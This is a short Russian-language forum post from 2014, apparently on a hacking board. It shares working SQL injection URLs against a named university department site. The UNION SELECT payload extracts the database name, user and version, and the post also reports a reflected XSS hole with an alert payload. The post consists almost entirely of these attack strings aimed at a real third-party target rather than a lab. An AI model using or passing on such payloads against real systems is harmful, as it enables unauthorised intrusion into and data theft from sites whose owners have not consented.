
08.04.2014, 12:50
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от unic0rn
Код:
http://mfc.edu/event.php?id=-16%27+UNION+SELECT+1,concat_ws%280x3e3e,database%28%29,user%28%29%29,3,version%28%29,5,6,7,8+--+
DEPARTMENT OF FINANCIAL STUDIES UNIVERSITY OF DELHI, PR4
Может кому интересно будет, тут присутствует еще одна уязвимость - отраженная XSS:
Сообщение от None
mfc.edu/event.php?id=-8' union select 1,concat_ws(0x3a,database
%2528
),user()),3,version(),5,6,7,8--
alert(/Antichat/)
|
|
|